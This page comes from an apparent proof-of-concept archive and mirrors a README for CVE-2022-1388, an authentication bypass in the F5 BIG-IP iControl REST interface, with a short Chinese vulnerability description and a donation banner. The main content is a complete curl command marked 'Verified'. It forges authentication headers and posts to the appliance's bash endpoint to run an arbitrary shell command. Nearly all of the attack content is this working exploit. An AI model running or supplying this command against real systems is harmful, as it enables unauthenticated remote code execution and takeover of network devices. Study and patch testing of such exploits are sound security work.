Goal Reached Thanks to every supporter — we hit 100%!

Goal: 1000 CNY · Raised: 1000 CNY

100.0%

CVE-2022-1388 PoC — F5 BIG-IP 访问控制错误漏洞

Source
Associated Vulnerability
Title:F5 BIG-IP 访问控制错误漏洞 (CVE-2022-1388)
Description:F5 BIG-IP是美国F5公司的一款集成了网络流量管理、应用程序安全管理、负载均衡等功能的应用交付平台。 F5 BIG-IP 存在访问控制错误漏洞,攻击者可以通过未公开的请求利用该漏洞绕过BIG-IP中的iControl REST身份验证来控制受影响的系统。
Description
K23605346: BIG-IP iControl REST vulnerability CVE-2022-1388
Readme
# CVE-2022-1388
BIG-IP iControl REST vulnerability CVE-2022-1388



# Usage 

* This POC is Verified!

![poc](https://github.com/numanturle/CVE-2022-1388/blob/main/rce.jpeg?raw=true)
![poc](https://github.com/numanturle/CVE-2022-1388/blob/main/pic.jpeg?raw=true)

```
curl -i -s -k -X $'POST' \
    -H $'Host: localhost' -H $'Connection: keep-alive, X-F5-Auth-Token' -H $'Authorization: Basic YWRtaW46' -H $'X-F5-Auth-Token: a' -H $'Content-Length: 39' \
    --data-binary $'{\"command\":\"run\",\"utilCmdArgs\":\"-c id\"}' \
    $'https://IP_HERE/mgmt/tm/util/bash'
 ```


# Reference 

https://twitter.com/1ZRR4H/status/1522150111429726209
https://twitter.com/AnnaViolet20/status/1523564632140509184
File Snapshot

[4.0K] /data/pocs/7ae4d9b762eaa376d73079ebd2fb81a333a02f99 ├── [ 716] bigip-icontrol-rest-rce.yaml ├── [ 449] f5-icontrol-rest-api-auth-bypass.yaml ├── [ 92K] pic.jpeg ├── [113K] rce.jpeg └── [ 702] README.md 0 directories, 5 files
Shenlong Bot has cached this for you
Remarks
    1. It is advised to access via the original source first.
    2. If the original source is unavailable, please email f.jinxu#gmail.com for a local snapshot (replace # with @).
    3. Shenlong has snapshotted the POC code for you. To support long-term maintenance, please consider donating. Thank you for your support.